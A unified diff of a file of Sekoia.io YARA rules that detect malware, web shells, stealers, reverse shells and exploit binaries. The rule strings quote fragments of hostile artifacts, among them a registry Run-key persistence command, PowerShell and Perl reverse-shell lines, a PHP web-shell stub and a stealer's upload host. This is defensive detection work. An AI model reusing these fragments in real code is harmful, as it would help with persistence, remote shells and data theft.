-		$ = "monitorIntervalSeconds" ascii
-		$ = "displayNewTickets" ascii
-		$ = "658c8b7f-3664-4a95-9572-a3e5871dfc06" ascii
+		$ = "Libraries\\CNNUDTV"
+		$ = "cmd.exe /C wuwebv.exe -t -e"
+		$ = "cmd.exe /C reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v ACNTV /t REG_SZ /d \"Rundll32.exe SHELL32.DLL,ShellExec_RunDLL"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
+		uint16( 0 ) == 0x5A4D and 3 of them or pe.imphash ( ) == "1b3d8fae6035e34f91baa59643746efe" or hash.md5 ( pe.rich_signature.clear_data ) == "44022b7cefeae4d55edcceb5b9bcd295" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "1cdcb493593f8793b10e109f6b5b2993" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "276d668ed7d1b46e101425e02a16460f" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f6a474220add335b5696256235ce8c9c" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "82bccb3330d50080f86ab1aa566cae8e" )
 }
-rule SEKOIA_Apt_Unk_Hrserv_Memory_Commands_Strings
+
+rule SEKOIA_Loader_Win_Doppeldridex
 {
 	meta:
-		description = "Detects HrServ web shell memory commands"
+		description = "Detect the DoppelDridex banking trojan using its Rich header"
 		author = "Sekoia.io"
-		id = "1b5f442a-e758-4bd5-a612-8b504a542d29"
-		date = "2023-11-23"
+		id = "ee5111ae-ba0b-4cd3-abe6-c66324d16840"
+		date = "2021-09-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_unk_hrserv_memory_commands_strings.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_doppeldridex.yar#L3-L33"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a87c35658ded301c098f9ee8ee5886a54e89537eabd145cf82b0286c703a77d2"
+		logic_hash = "4ceed302cb36b73d98070996ede64742579a261ef3ede6e1eb1723ddca32e839"
 		score = 75
 		quality = 80
 		tags = ""
-		version = "1.0"
+		version = "1.1"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$ = "list all the process" ascii wide
-		$ = "equal with cmd /c tasklist" ascii wide
-		$ = "start target service by name" ascii wide
-		$ = "query local process information by wmi." ascii wide
-		$ = "upload local shellcode to" ascii wide
-
 	condition:
-		all of them
+		pe.rich_signature.toolid( 122 , 50727 ) and pe.rich_signature.toolid ( 1 , 0 ) and pe.rich_signature.toolid ( 222 , 40629 ) and pe.rich_signature.toolid ( 131 , 30729 ) and pe.rich_signature.toolid ( 220 , 31101 ) and pe.rich_signature.toolid ( 202 , 60315 ) and pe.rich_signature.toolid ( 202 , 50727 ) and pe.rich_signature.toolid ( 261 , 23506 ) and pe.rich_signature.toolid ( 149 , 21022 ) and pe.rich_signature.toolid ( 261 , 23918 ) and pe.rich_signature.toolid ( 219 , 21005 ) and pe.rich_signature.toolid ( 171 , 30319 ) and pe.rich_signature.toolid ( 225 , 21005 ) and pe.rich_signature.toolid ( 221 , 21005 ) and pe.rich_signature.toolid ( 259 , 24210 ) and pe.rich_signature.toolid ( 258 , 24213 ) and pe.rich_signature.toolid ( 158 , 40219 ) and pe.rich_signature.toolid ( 145 , 21022 ) and pe.rich_signature.toolid ( 207 , 60315 ) and pe.rich_signature.toolid ( 256 , 23026 )
 }
-rule SEKOIA_Implant_Win_Flagpro : FILE
+rule SEKOIA_Weevely_Webshell_Payload : FILE
 {
 	meta:
-		description = "Detect the Flagpro malware used by Blacktech"
+		description = "Detects weevely webshell"
 		author = "Sekoia.io"
-		id = "08dd2de4-b359-424f-af04-7f294d519363"
-		date = "2022-04-22"
+		id = "f2879c6e-3d1b-41be-8b1d-4f0503fd4b29"
+		date = "2024-04-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_flagpro.yar#L1-L26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/weevely_webshell_payload.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "eb1aba9924af474d6d890572a9bf72e0d1aa5dc31dd4cc34648195b0207ab4d6"
+		logic_hash = "bb02ec519d77526cc81ebd7743336b333b9498f79079f7008970cf1bb51c4948"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "<BODY ID=CV20_LoaderDlg BGCOLOR=LIGHTGREY style=\"font-family:MS Shell Dlg;font-size:8\">" ascii
-		$ = "<TABLE WIDTH=100% HEIGHT=100%>" ascii
-		$ = "<TR WIDTH=100% HEIGHT=45%>" ascii
-		$ = "<TD ALIGN=CENTER VALIGN=BOTTOM>" ascii
-		$ = "TODO: Place controls here." ascii
-		$ = "<TD ALIGN=RIGHT VALIGN=BOTTOM>" ascii
-		$ = "<BUTTON STYLE=\"WIDTH:100\" ID=\"ButtonHelp\">Help</BUTTON>&nbsp;&nbsp;<BUTTON STYLE=\"WIDTH:100\" ID=\"ButtonOK\">OK</BUTTON>&nbsp;<BUTTON STYLE=\"WIDTH:100\" ID=\"ButtonCancel\">Cancel</BUTTON>" ascii
-		$about_loader = /About V[0-9]+\.[0-9]+_Loader.../ wide
-		$path = "f:\\dd\\vctools\\vc7libs\\ship\\atlmfc\\include\\" wide
-		$regitry = "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\" wide
+		$s1 = "<?php include \""
+		$s2 = ".basename(__FILE__).\""
+		$s3 = ";__HALT_COMPILER(); ?>"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of them and filesize < 1MB and @s1 == 0 and @s2 < @s3
 }
-rule SEKOIA_Recotool_Adfind_Strings : FILE
+
+rule SEKOIA_Apt_Muddywater_Moriagent : FILE
 {
 	meta:
-		description = "Detects Adfind utility based on strings"
+		description = "Detects Muddy's Mori Agent implant"
 		author = "Sekoia.io"
-		id = "afca88ef-756a-4b2b-91d7-d18d730e7074"
-		date = "2022-02-08"
+		id = "e7a83663-6a30-416a-8f29-87a6b9445ea4"
+		date = "2022-01-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/recotool_adfind_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_muddywater_moriagent.yar#L3-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "cc1e1dceff28136082f19cebc7584ba08c9006b964e37fc3fda91bc0b41906dc"
+		logic_hash = "21389d4e71e9a19a9d263b8ced740c337ea88ed4ac97199897b0aa3f5914594a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -256880,55 +257028,57 @@ rule SEKOIA_Recotool_Adfind_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Find all person objects on cn=ab container of local ADAM instance"
-		$ = "IPv6 IP address w/ port is specified [address]:port"
-		$ = "Search Global Catalog (port 3268)."
-		$ = "~~~ADCSV~~~"
-		$ = "adfind -b dc="
+		$mut = "0x50504060" ascii fullword
+		$cmd1 = "TType" ascii fullword
+		$cmd2 = "TPath" ascii fullword
+		$cmd3 = "TFileid" ascii fullword
+		$cmd4 = "TCommand" ascii fullword
+		$cmd5 = "TTimeout" ascii fullword
+		$cmd6 = "TFilter" ascii fullword
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 5MB and 4 of them
+		uint16be( 0 ) == 0x4d5a and ( ( pe.number_of_exports == 2 and pe.exports ( "DllRegisterServer" ) and pe.exports ( "DllUnregisterServer" ) ) and ( 5 of them ) )
 }
-rule SEKOIA_Apt_Gamaredon_Powerrevshell : FILE
+rule SEKOIA_Exploit_Cve20191458_Strings : CVE_2019_1458 FILE
 {
 	meta:
-		description = "Detects Powershell reverse shell"
+		description = "Detects compiled exploit for CVE-2019-1458 (Generic)"
 		author = "Sekoia.io"
-		id = "b5161c23-c607-4096-9f4a-1be516a0a614"
-		date = "2023-02-08"
+		id = "0be4a550-0f0a-4596-ab32-aafaececf919"
+		date = "2022-08-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_powerrevshell.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/exploit_cve20191458_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "fc5abcdf47641c1e7978cf076550f38987305bb2171b3e65f7865102a065af43"
+		logic_hash = "8e22a79b3d7dc45d63062c71909faee61584c71b6ea7353ba0f40c00745a2075"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = "CVE-2019-1458, FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "iex $enc.GetString("
-		$ = "$stream.Write"
-		$ = ".).FullName"
-		$ = "Sockets.TcpClient"
-		$ = "\">\";"
+		$ = "[-] Failed to create SploitWnd window"
+		$ = "[+] ProcessCreated with pid %d!"
+		$ = "[!] Exploit fail, test:0x%p,tagWND:0x%p, error:0x%lx"
+		$ = "[*] tagWND: 0x%p, tagCLS:0x%p, gap:0x%llx"
+		$ = "[*] Simulating alt key press"
 
 	condition:
-		all of them and filesize < 3000
+		uint16be( 0 ) == 0x4d5a and filesize < 200KB and 3 of them
 }
-rule SEKOIA_Apt_Badmagic_Ld_Dll_Loader_Pshscript : FILE
+rule SEKOIA_Apt_Rusticweb_Stealer : FILE
 {
 	meta:
-		description = "Detects BadMagic DLL Loader powershell script"
+		description = "Detects stealer used by RusticWeb"
 		author = "Sekoia.io"
-		id = "d4a23afc-693f-4fab-b2c4-15eecba047f7"
-		date = "2023-05-15"
+		id = "813072e0-28de-4cb7-b2cc-71d77a1e8508"
+		date = "2024-01-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_ld_dll_loader_pshscript.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_rusticweb_stealer.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8482521fe1f90c008948e551df35448b870145cf8b58f3c5019cafb66bb0ae36"
+		logic_hash = "68f802ef442e68cbcca789eae2bb8a4395af86699320e5a8101c07469e7555fb"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -256936,30 +257086,27 @@ rule SEKOIA_Apt_Badmagic_Ld_Dll_Loader_Pshscript : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$ModulePath = \"$folder_path\\$name"
-		$ = "$ModuleExport ="
-		$ = "start-job -ScriptBlock $ScriptBlock"
-		$ = "Invoke-WebRequest -Uri"
+		$s1 = "-FTT=@"
+		$s2 = "https://oshi.at"
+		$s3 = "curl-T"
+		$s4 = "upload/upload.php"
+		$s5 = "cargo"
 
 	condition:
-		all of them and filesize < 1KB
+		uint16be( 0 ) == 0x4d5a and filesize < 4MB and 3 of them
 }
-rule SEKOIA_Apt_Redhotel_Maliciouslnk_Strings : FILE
+rule SEKOIA_Pe_Stealer_Scarletstealer_Strings : FILE
 {
 	meta:
-		description = "Detects RedHotel's malicious LNKs"
+		description = "ScarletStealer strings"
 		author = "Sekoia.io"
-		id = "df2f0002-7921-4378-a936-ea0de5fbfa5a"
-		date = "2024-09-06"
+		id = "ca930851-513f-44e5-abb4-ca0edfde3428"
+		date = "2023-12-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_redhotel_maliciouslnk_strings.yar#L1-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/pe_stealer_scarletstealer_strings.yar#L1-L33"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "8e2c17040ec78cbcdc07bb2cf9dd7e01"
-		hash = "dc613a519e515ca817fdfb88f81fc9d7"
-		hash = "6f7d85c196c277a6a619f6d94b8f69b9"
-		hash = "b04d484d1e1d793b04af2a5fb88a8a57"
-		logic_hash = "c1d64b3eca5961d7eaab82a6934299642a70301ef791493a371ae5a29376225f"
+		logic_hash = "308055cbe960614112682585b5709a62c2639752df07661d6b2bb13e390b3b08"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -256967,55 +257114,67 @@ rule SEKOIA_Apt_Redhotel_Maliciouslnk_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "desktop-" ascii
-		$ = ".\\1.docx" wide
-		$ = ".\\1.pdf" wide
-		$ = ".\\1.doc" wide
-		$ = ".\\1.ppt" wide
-		$ = ".\\1.pptx" wide
-		$ = "MACOS" wide
+		$s1 = "Scarlet Client" wide
+		$s2 = "] PC NAME:   (" wide
+		$s3 = "] IP:   (" wide
+		$s4 = " - Wallets -" wide
+		$s5 = "] Exodus:  (" wide
+		$s6 = "] Electrum:  (" wide
+		$s7 = "] Atomic:  (" wide
+		$s8 = "] Guarda:  (" wide
+		$s9 = "] Coinomi: (" wide
+		$s10 = "] Monero:  (" wide
+		$s11 = "] Ledger:  (" wide
+		$s12 = "] Bitbox:  (" wide
+		$s13 = "] Trezor:  (" wide
+		$s14 = ") Support: PointX@exploit.im - @isPointX" wide
+		$a2 = "/config/tk.txt" wide
+		$a3 = "/config/chatid.txt" wide
+		$a1 = "telebyt.com" wide
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and 3 of them
+		uint16be( 0 ) == 0x4d5a and filesize > 50KB and filesize < 2MB and 13 of ( $s* ) and 2 of ( $a* )
 }
-rule SEKOIA_Tool_Edrsandblast_Kernelcallbacks : FILE
+rule SEKOIA_Apt_Apt41_Powershell_Exfiltration_Script : FILE
 {
 	meta:
-		description = "Detects EDRSandblast KernelCallbacks strings"
+		description = "Detects PowerShell exfiltration script"
 		author = "Sekoia.io"
-		id = "74cf4444-5bd6-4167-930a-5dbf2e529f92"
-		date = "2024-11-25"
+		id = "9a15f845-c0af-4f1c-a033-b4f40232dc0d"
+		date = "2023-11-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_edrsandblast_kernelcallbacks.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt41_powershell_exfiltration_script.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ffb1185dca42c5b2b273c3a48f3ba86204a3474a9a045f72dbdb0ba7c9e89c7d"
+		logic_hash = "0ba4118855d6bd54cbb3a35e3b5fc36484eeb1e742ed3480e6c967b078ec4881"
 		score = 75
-		quality = 80
+		quality = 72
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[+] '%s' service ACL configured to for Everyone" wide
-		$ = "%s callback of EDR driver \"%s\" [callback addr: 0x%I64x" wide
-		$ = "[!] Could not resolve %s kernel module's address" wide
+		$ = "$UPLOAD_PASSPORT" ascii wide nocase
+		$ = "$fileName=$singleFile.Name" ascii wide nocase
+		$ = "Upload-Passport" ascii wide nocase
+		$ = "$singleFile in $files" ascii wide nocase
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 3MB and 3 of them
+		filesize < 10KB and all of them
 }
-rule SEKOIA_Apt_Implant_Xdealer_Linux_Variant_Strings : FILE
+rule SEKOIA_Apt_Cottonsandstorm_Win_Implant : FILE
 {
 	meta:
-		description = "Detects XDealer linux variant"
+		description = "Detects a simple win implant used by Cotton Sandstorm"
 		author = "Sekoia.io"
-		id = "42690513-753f-4296-b641-4d3b59a5e5e1"
-		date = "2024-03-22"
+		id = "04a5255c-f9bb-4612-b0e2-ed0326867055"
+		date = "2024-11-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_implant_xdealer_linux_variant_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cottonsandstorm_win_implant.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "400beb53d0f7b7727962175c7c4f8dfccdfed56bb3978d3e847147e8ad7644fb"
+		hash = "f797d71ed07d6e05556300e4ce0f2927"
+		logic_hash = "dcb25ee236ca52f23cc6bfdbcedcbc6d407e88f06341e684f202a59954733ade"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -257023,29 +257182,30 @@ rule SEKOIA_Apt_Implant_Xdealer_Linux_Variant_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "ls -l /proc/%s/exe"
-		$ = "Linux_%s_%s_%u"
-		$ = "chkconfig --add"
-		$ = "cmd over return [%s]"
-		$ = "touch   -d"
-		$ = "%s can't be opened/n"
-		$ = "/proc/%s/status"
+		$ = "DIR =>" wide
+		$ = "type=machines&md5=" wide
+		$ = "File =>" wide
+		$ = "&ip=" wide fullword
+		$ = "&un=" wide fullword
+		$ = "&cp=" wide fullword
+		$ = "myFile\";filename=" ascii
+		$ = "ifB75BcjsRBhy2et" ascii
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and 3 of them and filesize < 1MB
+		uint16be( 0 ) == 0x4d5a and 4 of them and filesize < 500KB
 }
-rule SEKOIA_Apt_Cloudatlas_Rtf_Shellcode_Cve_2018_0798 : FILE
+rule SEKOIA_Apt_Ta428_Tmanger_Strings : FILE
 {
 	meta:
-		description = "CloudAtlas Shellcode for CVE_2018_0798 "
+		description = "Detects Tmanger malware"
 		author = "Sekoia.io"
-		id = "6c602c66-df40-4436-800f-e548dacc1e81"
-		date = "2022-12-01"
+		id = "f600404d-3f93-4e3f-bba7-9f519f67c6cb"
+		date = "2022-09-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudatlas_rtf_shellcode_cve_2018_0798.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_ta428_tmanger_strings.yar#L1-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a8c320ca81ef196b84a8fb08d9e02ef8cfb338024fa7e6776ff6c8c049b8e63c"
+		logic_hash = "e045f38367fa7f3cdcc908e60de4386889c7878c95b1a40f63fd70683699b0f1"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -257053,45 +257213,59 @@ rule SEKOIA_Apt_Cloudatlas_Rtf_Shellcode_Cve_2018_0798 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "6060606061616161616161616161616161616161FB0B00004bE8FFFFFFFFC35F83C71B33C966B908010f0d00ddd8d97424f4668137" ascii nocase
+		$ = "sock_hmutex" wide ascii
+		$ = "cmd_hmutex" wide ascii
+		$ = "%s_%d.bmp" wide ascii
+		$ = "WSAStartup Error!" wide ascii
+		$ = "4551-8f84-08e738aec" wide ascii
+		$ = "Init failed!" wide ascii
+		$ = "GetLanIP error!" wide ascii
+		$ = "chcp & exit" wide ascii
+		$ = "GetHostname error!" wide ascii
+		$ = "[Num Lock]" wide ascii
 
 	condition:
-		filesize < 8MB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 200KB and 4 of them
 }
-
-rule SEKOIA_Tool_Pchunter_And_Related_Certificate : FILE
+rule SEKOIA_Apt_Implant_Xdealer_Stealer_Strings : FILE
 {
 	meta:
-		description = "Detects PCHunter and associated binairies & drivers"
+		description = "Detects stealer module of XDealer"
 		author = "Sekoia.io"
-		id = "757c7738-4ee8-4b4e-bdda-0c5b0c010f40"
-		date = "2022-09-07"
+		id = "6314cf6c-2c3b-4e9a-87a1-b56ee148474c"
+		date = "2024-03-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_pchunter_and_related_certificate.yar#L3-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_implant_xdealer_stealer_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "924a85b2eaec73b628e705b3bb2e464582a71c19317d2023b1422b1b8ad97a51"
+		logic_hash = "79ba2fd14cd2eb73848026f79ce6115df813e0fda3a071ab26659874e04e2201"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$ = "%sbmp.tmp"
+		$ = "%sjgp.tmp"
+		$ = "%sma_%s_%05u_%u."
+		$ = "%s%s_%05u_%u."
+
 	condition:
-		uint16be( 0 ) == 0x4d5a and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial contains "05:51:bc:8c:6a:a2:ca:03:2b:c6:71:38:30:d8:49:a3" ) and filesize > 400KB and filesize < 20MB
+		uint16be( 0 ) == 0x4d5a and filesize < 500KB and all of them
 }
-rule SEKOIA_Generic_Perl_Reverse_Shell : FILE
+rule SEKOIA_Apt_Gamaredon_Stealer_Obfuscation_1 : FILE
 {
 	meta:
-		description = "Detects simple reverse shell written in Perl"
+		description = "Matches the Gamaredon Stealer obfuscation"
 		author = "Sekoia.io"
-		id = "4eb2ef0d-3ada-4566-bd82-8c75d6931acc"
-		date = "2023-12-08"
+		id = "a6197d16-8ed1-410b-8814-d7eff9a8096c"
+		date = "2022-02-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_perl_reverse_shell.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_stealer_obfuscation_1.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "d0a23db712746bac4684d6b4508dd891caf06d72af153b1a0ab489a93edbfaf4"
+		logic_hash = "7f6a5f8af73c4eb7debbadfd22232ad4e3f44e3aae36c3d624ce7a1a050e8782"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -257099,25 +257273,24 @@ rule SEKOIA_Generic_Perl_Reverse_Shell : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "open(STDIN,\">&S\");"
-		$ = "open(STDERR,\">&S\");"
-		$ = "use Socket;$i="
+		$s1 = { 76 61 72 20 [5-30] 3d 20 6e 65 77 20 6f 62 6a 65 63 74 5b 5d 20 7b 20 [2-10] 2c 20 [2-10] 2c 20 [2-10] 2c 20 [2-10] 2c 20 [2-10] 2c 20 [2-10] 20 7d 3b }
+		$s2 = { 66 6f 72 28 69 6e 74 20 [5-30] 20 3d 20 30 3b 20 [5-30] 20 3c 20 31 30 3b 20 [5-30] 2b 2b 29 }
 
 	condition:
-		filesize < 300 and all of them
+		uint16be( 0 ) == 0x4d5a and filesize > 100MB and ( #s1 > 100 or #s2 > 100 )
 }
-rule SEKOIA_Dropper_Win_Konni_Cab : FILE
+rule SEKOIA_Apt_Ta410_Flowcloud_Rtti : FILE
 {
 	meta:
-		description = "Detect the CAB files used to drop the KONNI malware"
+		description = "Detects FlowCloud via RTTI"
 		author = "Sekoia.io"
-		id = "87a209d5-667a-4a81-837a-660ab98c33c8"
-		date = "2023-09-26"
+		id = "c6a18c08-8b98-46d7-a6c3-dc171c7791ac"
+		date = "2022-10-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/dropper_win_konni_cab.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_ta410_flowcloud_rtti.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b49bb875d5ddd4b815da5bd184ec7f1d23cfb7ad316760c9a9876607245d0a95"
+		logic_hash = "97f052c409c9b5de025d34180979cd4c322e67bab9f894d3b56c928340a6859b"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -257125,26 +257298,25 @@ rule SEKOIA_Dropper_Win_Konni_Cab : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$magic = "MSCF"
-		$file2 = "check.bat"
-		$file3 = "wpnprv64.dll"
-		$file4 = "wpnprv32.dll"
+		$RTTI_1 = ".?AVdllloader@@" ascii fullword
+		$RTTI_2 = ".?AVel_cryptowrapper@@" ascii fullword
+		$RTTI_3 = ".?AVAntiVirusCheck@@" ascii fullword
 
 	condition:
-		$magic at 0 and all of ( $file* )
+		uint16( 0 ) == 0x5A4D and filesize < 10MB and all of them
 }
-rule SEKOIA_Apt_Muddywater_Rotrot_Strings : FILE
+rule SEKOIA_Pe_Stealer_Axilestealer_Strings : FILE
 {
 	meta:
-		description = "Detects RotRot backdoor based on strings"
+		description = "AxileStealer strings"
 		author = "Sekoia.io"
-		id = "f7bc195a-0e60-4495-b78a-78f101543700"
-		date = "2024-06-10"
+		id = "412bfc3e-6bb7-4b0d-8bb3-96eae0cc9782"
+		date = "2023-12-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_muddywater_rotrot_strings.yar#L1-L36"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/pe_stealer_axilestealer_strings.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "425168003d0f14d791e7f46bf47c18652a1f6b66b9329155d2bca72cf0d8126b"
+		logic_hash = "829b80c07ed4d9439d66956dbb106aa0cc9961dd2e5c05ffbe6c67e516613590"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -257152,40 +257324,34 @@ rule SEKOIA_Apt_Muddywater_Rotrot_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "qsphsbnebub"
-		$s2 = "rtqitcofcvc"
-		$s3 = "surjudpgdwd"
-		$s4 = "tvskveqhexe"
-		$s5 = "uwtlwfrifyf"
-		$s6 = "vxumxgsjgzg"
-		$t1 = "MpbeMjcsbs"
-		$t2 = "NqcfNkdtct"
-		$t3 = "OrdgOleudu"
-		$t4 = "PsehPmfvev"
-		$t5 = "QtfiQngwfw"
-		$t6 = "RugjRohxgx"
-		$u1 = "UfsnjobufKpcPckfdu"
-		$u2 = "VgtokpcvgLqdQdlgev"
-		$u3 = "WhuplqdwhMreRemhfw"
-		$u4 = "XivqmrexiNsfSfnigx"
-		$u5 = "YjwrnsfyjOtgTgojhy"
-		$u6 = "ZkxsotgzkPuhUhpkiz"
+		$s1 = "http://ip-api.com/line/?fields=query,country,countryCode,city,regionName,zip,isp" wide
+		$s2 = "Axile.su" wide
+		$s3 = "Unknown Tokens.txt" wide
+		$a1 = "[ <b>General</b> ]" wide
+		$a2 = "[ <b>Browsers</b> ]" wide
